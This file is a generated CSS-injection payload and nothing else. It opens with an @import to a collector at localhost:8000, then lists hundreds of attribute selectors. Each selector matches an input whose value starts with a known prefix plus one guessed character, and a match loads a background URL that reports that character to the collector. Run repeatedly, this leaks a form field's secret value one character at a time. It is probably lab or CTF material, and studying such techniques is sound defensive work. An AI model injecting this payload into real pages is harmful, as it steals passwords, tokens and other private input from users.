@import url("http://localhost:8000/?l=11");
input[value="mojeimeje!"] {background: url("http://localhost:8000/?leak=!&q=0.03237108791528587");}
input[value="mojeimeje\""] {background: url("http://localhost:8000/?leak=\"&q=0.6062200130319086");}
input[value="mojeimeje#"] {background: url("http://localhost:8000/?leak=#&q=0.6728416240588255");}
input[value="mojeimeje$"] {background: url("http://localhost:8000/?leak=$&q=0.6539374950485228");}
input[value="mojeimeje%"] {background: url("http://localhost:8000/?leak=%&q=0.8506398934723409");}
input[value="mojeimeje&"] {background: url("http://localhost:8000/?leak=&&q=0.2329730015101137");}
input[value="mojeimeje'"] {background: url("http://localhost:8000/?leak='&q=0.7217670912249095");}
input[value="mojeimeje("] {background: url("http://localhost:8000/?leak=(&q=0.09254686463411033");}
input[value="mojeimeje)"] {background: url("http://localhost:8000/?leak=)&q=0.7146790433505263");}
input[value="mojeimeje*"] {background: url("http://localhost:8000/?leak=*&q=0.8669287226094695");}
input[value="mojeimeje+"] {background: url("http://localhost:8000/?leak=+&q=0.19018913019184058");}
input[value="mojeimeje,"] {background: url("http://localhost:8000/?leak=,&q=0.0790704179623356");}
input[value="mojeimeje-"] {background: url("http://localhost:8000/?leak=-&q=0.46919657731827513");}
input[value="mojeimeje."] {background: url("http://localhost:8000/?leak=.&q=0.17769636447147086");}
input[value="mojeimeje/"] {background: url("http://localhost:8000/?leak=/&q=0.3502778119865262");}
input[value="mojeimeje0"] {background: url("http://localhost:8000/?leak=0&q=0.008110428524469082");}
input[value="mojeimeje1"] {background: url("http://localhost:8000/?leak=1&q=0.79646788423664");}
input[value="mojeimeje2"] {background: url("http://localhost:8000/?leak=2&q=0.22080582932638237");}
input[value="mojeimeje3"] {background: url("http://localhost:8000/?leak=3&q=0.23676238170678254");}
input[value="mojeimeje4"] {background: url("http://localhost:8000/?leak=4&q=0.8162710350161608");}
input[value="mojeimeje5"] {background: url("http://localhost:8000/?leak=5&q=0.15513426638376582");}
input[value="mojeimeje6"] {background: url("http://localhost:8000/?leak=6&q=0.40646102279742236");}
input[value="mojeimeje7"] {background: url("http://localhost:8000/?leak=7&q=0.9766936104376631");}
input[value="mojeimeje8"] {background: url("http://localhost:8000/?leak=8&q=0.40225032889139833");}
input[value="mojeimeje9"] {background: url("http://localhost:8000/?leak=9&q=0.04036411202019097");}
input[value="mojeimeje:"] {background: url("http://localhost:8000/?leak=:&q=0.45129790270320935");}
input[value="mojeimeje;"] {background: url("http://localhost:8000/?leak=;&q=0.5602944893430328");}
input[value="mojeimeje<"] {background: url("http://localhost:8000/?leak=<&q=0.2074561148303644");}
input[value="mojeimeje="] {background: url("http://localhost:8000/?leak==&q=0.8889133053898763");}
input[value="mojeimeje>"] {background: url("http://localhost:8000/?leak=>&q=0.5457883930884688");}
input[value="mojeimeje?"] {background: url("http://localhost:8000/?leak=?&q=0.5655458081927656");}
input[value="mojeimeje@"] {background: url("http://localhost:8000/?leak=@&q=0.9963583952352677");}
input[value="mojeimejeA"] {background: url("http://localhost:8000/?leak=A&q=0.512904631756282");}
input[value="mojeimejeB"] {background: url("http://localhost:8000/?leak=B&q=0.9248061659682232");}
input[value="mojeimejeC"] {background: url("http://localhost:8000/?leak=C&q=0.6377110203586678");}
input[value="mojeimejeD"] {background: url("http://localhost:8000/?leak=D&q=0.3716762393028339");}
input[value="mojeimejeE"] {background: url("http://localhost:8000/?leak=E&q=0.8817219840674604");}
input[value="mojeimejeF"] {background: url("http://localhost:8000/?leak=F&q=0.5395418396113509");}
input[value="mojeimejeG"] {background: url("http://localhost:8000/?leak=G&q=0.9176560373672167");}
input[value="mojeimejeH"] {background: url("http://localhost:8000/?leak=H&q=0.2530035226212213");}
input[value="mojeimejeI"] {background: url("http://localhost:8000/?leak=I&q=0.052942605973681056");}
input[value="mojeimejeJ"] {background: url("http://localhost:8000/?leak=J&q=0.6299566389180482");}
input[value="mojeimejeK"] {background: url("http://localhost:8000/?leak=K&q=0.08963256825951427");}
input[value="mojeimejeL"] {background: url("http://localhost:8000/?leak=L&q=0.5791987014652689");}
input[value="mojeimejeM"] {background: url("http://localhost:8000/?leak=M&q=0.12482993191448188");}
input[value="mojeimejeN"] {background: url("http://localhost:8000/?leak=N&q=0.8537629501472792");}
input[value="mojeimejeO"] {background: url("http://localhost:8000/?leak=O&q=0.7036291329796807");}
input[value="mojeimejeP"] {background: url("http://localhost:8000/?leak=P&q=0.6358698261365141");}
input[value="mojeimejeQ"] {background: url("http://localhost:8000/?leak=Q&q=0.01682211955371038");}
input[value="mojeimejeR"] {background: url("http://localhost:8000/?leak=R&q=0.10605898842528472");}
input[value="mojeimejeS"] {background: url("http://localhost:8000/?leak=S&q=0.6015241746517168");}
input[value="mojeimejeT"] {background: url("http://localhost:8000/?leak=T&q=0.685936547305795");}
input[value="mojeimejeU"] {background: url("http://localhost:8000/?leak=U&q=0.11728573825640232");}
input[value="mojeimejeV"] {background: url("http://localhost:8000/?leak=V&q=0.5171302725935882");}
input[value="mojeimejeW"] {background: url("http://localhost:8000/?leak=W&q=0.6251920129108928");}
input[value="mojeimejeX"] {background: url("http://localhost:8000/?leak=X&q=0.1443206037877287");}
input[value="mojeimejeY"] {background: url("http://localhost:8000/?leak=Y&q=0.28444197373405933");}
input[value="mojeimejeZ"] {background: url("http://localhost:8000/?leak=Z&q=0.3729160093053945");}
input[value="mojeimeje["] {background: url("http://localhost:8000/?leak=[&q=0.09483361289938785");}
input[value="mojeimeje\\"] {background: url("http://localhost:8000/?leak=\\&q=0.2598548593339165");}
input[value="mojeimeje]"] {background: url("http://localhost:8000/?leak=]&q=0.9899035927127253");}
input[value="mojeimeje^"] {background: url("http://localhost:8000/?leak=^&q=0.591700450421772");}
input[value="mojeimeje_"] {background: url("http://localhost:8000/?leak=_&q=0.26781649059312107");}
input[value="mojeimeje`"] {background: url("http://localhost:8000/?leak=`&q=0.29624758353295855");}
input[value="mojeimejea"] {background: url("http://localhost:8000/?leak=a&q=0.8320035705278925");}
input[value="mojeimejeb"] {background: url("http://localhost:8000/?leak=b&q=0.31622002733522625");}
input[value="mojeimejec"] {background: url("http://localhost:8000/?leak=c&q=0.22601959647618597");}
input[value="mojeimejed"] {background: url("http://localhost:8000/?leak=d&q=0.9320480861143732");}
input[value="mojeimejee"] {background: url("http://localhost:8000/?leak=e&q=0.03243885190455709");}
input[value="mojeimejef"] {background: url("http://localhost:8000/?leak=f&q=0.978603617919366");}
input[value="mojeimejeg"] {background: url("http://localhost:8000/?leak=g&q=0.5511916445239795");}
input[value="mojeimejeh"] {background: url("http://localhost:8000/?leak=h&q=0.3550924348943527");}
input[value="mojeimejei"] {background: url("http://localhost:8000/?leak=i&q=0.3523963036980031");}
input[value="mojeimejej"] {background: url("http://localhost:8000/?leak=j&q=0.8057009190826296");}
input[value="mojeimejek"] {background: url("http://localhost:8000/?leak=k&q=0.750510877324756");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=l&q=0.8576352656130961");}
input[value="mojeimejem"] {background: url("http://localhost:8000/?leak=m&q=0.7874675999391152");}
input[value="mojeimejen"] {background: url("http://localhost:8000/?leak=n&q=0.28374651367953607");}
input[value="mojeimejeo"] {background: url("http://localhost:8000/?leak=o&q=0.3389669340503787");}
input[value="mojeimejep"] {background: url("http://localhost:8000/?leak=p&q=0.281130818366343");}
input[value="mojeimejeq"] {background: url("http://localhost:8000/?leak=q&q=0.4484105700354104");}
input[value="mojeimejer"] {background: url("http://localhost:8000/?leak=r&q=0.23521507242998707");}
input[value="mojeimejes"] {background: url("http://localhost:8000/?leak=s&q=0.21705407620099626");}
input[value="mojeimejet"] {background: url("http://localhost:8000/?leak=t&q=0.7761893472414549");}
input[value="mojeimejeu"] {background: url("http://localhost:8000/?leak=u&q=0.9972253959349779");}
input[value="mojeimejev"] {background: url("http://localhost:8000/?leak=v&q=0.7399749126073676");}
input[value="mojeimejew"] {background: url("http://localhost:8000/?leak=w&q=0.5970379294717383");}
input[value="mojeimejex"] {background: url("http://localhost:8000/?leak=x&q=0.0736161565228306");}
input[value="mojeimejey"] {background: url("http://localhost:8000/?leak=y&q=0.008480710117469092");}
input[value="mojeimejez"] {background: url("http://localhost:8000/?leak=z&q=0.1848447022585531");}
input[value="mojeimeje{"] {background: url("http://localhost:8000/?leak={&q=0.20002901058906786");}
input[value="mojeimeje|"] {background: url("http://localhost:8000/?leak=|&q=0.6701107801552053");}
input[value="mojeimeje}"] {background: url("http://localhost:8000/?leak=}&q=0.5351489565337844");}
input[value="mojeimeje~"] {background: url("http://localhost:8000/?leak=~&q=0.662117460379102");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.5316526172213021");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.9022374195274758");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.6859817002465436");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.8374054818854753");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.9876147931948476");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.07278086052995669");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.2603237254788775");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.07668466234349536");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.8285951598486823");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.43881640667927146");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.3768589916913132");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.026557703580905034");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.7894271492497187");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.6406181018797337");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.08259489936651554");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.547264586743627");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.9402249338638597");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.85579197489677");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.6690448258376689");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.2725935707068663");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.5479232138597361");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.031182616681584063");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.7868738549287329");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.18839805497768203");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.2765802291319701");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.06504738135994659");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.8871792301716541");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.9032904986420851");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.053700196328145156");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.8947227298959448");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.36846799069634195");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.38958285425289585");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=&q=0.734992777830831");}
input[value="mojeimeje "] {background: url("http://localhost:8000/?leak= &q=0.5915514527338617");}
input[value="mojeimeje¡"] {background: url("http://localhost:8000/?leak=¡&q=0.7989246636931251");}
input[value="mojeimeje¢"] {background: url("http://localhost:8000/?leak=¢&q=0.9755835265942232");}
input[value="mojeimeje£"] {background: url("http://localhost:8000/?leak=£&q=0.6931282913342098");}
input[value="mojeimeje¤"] {background: url("http://localhost:8000/?leak=¤&q=0.04523185081567638");}
input[value="mojeimeje¥"] {background: url("http://localhost:8000/?leak=¥&q=0.5598776275867103");}
input[value="mojeimeje¦"] {background: url("http://localhost:8000/?leak=¦&q=0.4263936569904201");}
input[value="mojeimeje§"] {background: url("http://localhost:8000/?leak=§&q=0.7501866131301871");}
input[value="mojeimeje¨"] {background: url("http://localhost:8000/?leak=¨&q=0.8286145338443731");}
input[value="mojeimeje©"] {background: url("http://localhost:8000/?leak=©&q=0.8052385706936982");}
input[value="mojeimejeª"] {background: url("http://localhost:8000/?leak=ª&q=0.40655916027080474");}
input[value="mojeimeje«"] {background: url("http://localhost:8000/?leak=«&q=0.42893799220629325");}
input[value="mojeimeje¬"] {background: url("http://localhost:8000/?leak=¬&q=0.8340432706176102");}
input[value="mojeimeje­"] {background: url("http://localhost:8000/?leak=­&q=0.5938480744166945");}
input[value="mojeimeje®"] {background: url("http://localhost:8000/?leak=®&q=0.7417043423633947");}
input[value="mojeimeje¯"] {background: url("http://localhost:8000/?leak=¯&q=0.9440790068196456");}
input[value="mojeimeje°"] {background: url("http://localhost:8000/?leak=°&q=0.46339490468570443");}
input[value="mojeimeje±"] {background: url("http://localhost:8000/?leak=±&q=0.8873265218900466");}
input[value="mojeimeje²"] {background: url("http://localhost:8000/?leak=²&q=0.6600242937181984");}
input[value="mojeimeje³"] {background: url("http://localhost:8000/?leak=³&q=0.150576576341366");}
input[value="mojeimeje´"] {background: url("http://localhost:8000/?leak=´&q=0.5666303827939598");}
input[value="mojeimejeµ"] {background: url("http://localhost:8000/?leak=µ&q=0.054687693100253565");}
input[value="mojeimeje¶"] {background: url("http://localhost:8000/?leak=¶&q=0.9148037987744546");}
input[value="mojeimeje·"] {background: url("http://localhost:8000/?leak=·&q=0.41120079897428274");}
input[value="mojeimeje¸"] {background: url("http://localhost:8000/?leak=¸&q=0.7374578422611082");}
input[value="mojeimeje¹"] {background: url("http://localhost:8000/?leak=¹&q=0.6873615576889907");}
input[value="mojeimejeº"] {background: url("http://localhost:8000/?leak=º&q=0.621728741508458");}
input[value="mojeimeje»"] {background: url("http://localhost:8000/?leak=»&q=0.39522937348340514");}
input[value="mojeimeje¼"] {background: url("http://localhost:8000/?leak=¼&q=0.001044238793407537");}
input[value="mojeimeje½"] {background: url("http://localhost:8000/?leak=½&q=0.8713854209410485");}
input[value="mojeimeje¾"] {background: url("http://localhost:8000/?leak=¾&q=0.8953416317998213");}
input[value="mojeimeje¿"] {background: url("http://localhost:8000/?leak=¿&q=0.33278256050451205");}
input[value="mojeimejeÀ"] {background: url("http://localhost:8000/?leak=À&q=0.3449001227392898");}
input[value="mojeimejeÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.7951171145023415");}
input[value="mojeimejeÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.9833363906791794");}
input[value="mojeimejeÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.9422097484120153");}
input[value="mojeimejeÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.9560252405890377");}
input[value="mojeimejeÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.10841083029058596");}
input[value="mojeimejeÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.8407719198193102");}
input[value="mojeimejeÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.009508492708636185");}
input[value="mojeimejeÈ"] {background: url("http://localhost:8000/?leak=È&q=0.32334885996169493");}
input[value="mojeimejeÉ"] {background: url("http://localhost:8000/?leak=É&q=0.571180970232906");}
input[value="mojeimejeÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.14701060993186044");}
input[value="mojeimejeË"] {background: url("http://localhost:8000/?leak=Ë&q=0.6463536247803987");}
input[value="mojeimejeÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.2443127927944846");}
input[value="mojeimejeÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.13857274815540177");}
input[value="mojeimejeÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.7278065626913683");}
input[value="mojeimejeÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.01636453639458435");}
input[value="mojeimejeÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.5576043955536885");}
input[value="mojeimejeÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.2935178549115629");}
input[value="mojeimejeÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.9361947080964632");}
input[value="mojeimejeÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.17400592058275177");}
input[value="mojeimejeÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.03784223411379184");}
input[value="mojeimejeÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.22552653495198638");}
input[value="mojeimejeÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.3127996479907149");}
input[value="mojeimeje×"] {background: url("http://localhost:8000/?leak=×&q=0.6004152919576065");}
input[value="mojeimejeØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.9050901674531107");}
input[value="mojeimejeÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.9943687235786298");}
input[value="mojeimejeÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.5832929055571294");}
input[value="mojeimejeÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.9734377228565081");}
input[value="mojeimejeÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.2589591887502454");}
input[value="mojeimejeÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.7538502773620792");}
input[value="mojeimejeÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.8611799929814647");}
input[value="mojeimejeß"] {background: url("http://localhost:8000/?leak=ß&q=0.08778965616030243");}
input[value="mojeimejeà"] {background: url("http://localhost:8000/?leak=à&q=0.5798174899715656");}
input[value="mojeimejeá"] {background: url("http://localhost:8000/?leak=á&q=0.46802535211114416");}
input[value="mojeimejeâ"] {background: url("http://localhost:8000/?leak=â&q=0.7927887927492527");}
input[value="mojeimejeã"] {background: url("http://localhost:8000/?leak=ã&q=0.06558784981798671");}
input[value="mojeimejeä"] {background: url("http://localhost:8000/?leak=ä&q=0.5147988375480725");}
input[value="mojeimejeå"] {background: url("http://localhost:8000/?leak=å&q=0.0745262323495941");}
input[value="mojeimejeæ"] {background: url("http://localhost:8000/?leak=æ&q=0.6937569201837599");}
input[value="mojeimejeç"] {background: url("http://localhost:8000/?leak=ç&q=0.038795512273835486");}
input[value="mojeimejeè"] {background: url("http://localhost:8000/?leak=è&q=0.7823785028870753");}
input[value="mojeimejeé"] {background: url("http://localhost:8000/?leak=é&q=0.091802867753072");}
input[value="mojeimejeê"] {background: url("http://localhost:8000/?leak=ê&q=0.5337860808039181");}
input[value="mojeimejeë"] {background: url("http://localhost:8000/?leak=ë&q=0.13879593155868286");}
input[value="mojeimejeì"] {background: url("http://localhost:8000/?leak=ì&q=0.6406079771526074");}
input[value="mojeimejeí"] {background: url("http://localhost:8000/?leak=í&q=0.22753838007178162");}
input[value="mojeimejeî"] {background: url("http://localhost:8000/?leak=î&q=0.05152559836780046");}
input[value="mojeimejeï"] {background: url("http://localhost:8000/?leak=ï&q=0.5439996956473037");}
input[value="mojeimejeð"] {background: url("http://localhost:8000/?leak=ð&q=0.7302475806114423");}
input[value="mojeimejeñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.5015521274566233");}
input[value="mojeimejeò"] {background: url("http://localhost:8000/?leak=ò&q=0.6777339125057413");}
input[value="mojeimejeó"] {background: url("http://localhost:8000/?leak=ó&q=0.8428299116479561");}
input[value="mojeimejeô"] {background: url("http://localhost:8000/?leak=ô&q=0.8352062777863511");}
input[value="mojeimejeõ"] {background: url("http://localhost:8000/?leak=õ&q=0.8421779671531404");}
input[value="mojeimejeö"] {background: url("http://localhost:8000/?leak=ö&q=0.10283941968248489");}
input[value="mojeimeje÷"] {background: url("http://localhost:8000/?leak=÷&q=0.3254344361961834");}
input[value="mojeimejeø"] {background: url("http://localhost:8000/?leak=ø&q=0.25201730084193463");}
input[value="mojeimejeù"] {background: url("http://localhost:8000/?leak=ù&q=0.47837585112810577");}
input[value="mojeimejeú"] {background: url("http://localhost:8000/?leak=ú&q=0.17207361123614007");}
input[value="mojeimejeû"] {background: url("http://localhost:8000/?leak=û&q=0.5615686043543826");}
input[value="mojeimejeü"] {background: url("http://localhost:8000/?leak=ü&q=0.1578722296733972");}
input[value="mojeimejeý"] {background: url("http://localhost:8000/?leak=ý&q=0.9770588111543304");}
input[value="mojeimejeþ"] {background: url("http://localhost:8000/?leak=þ&q=0.15992747019378184");}
input[value="mojeimejeÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.8911083153939581");}
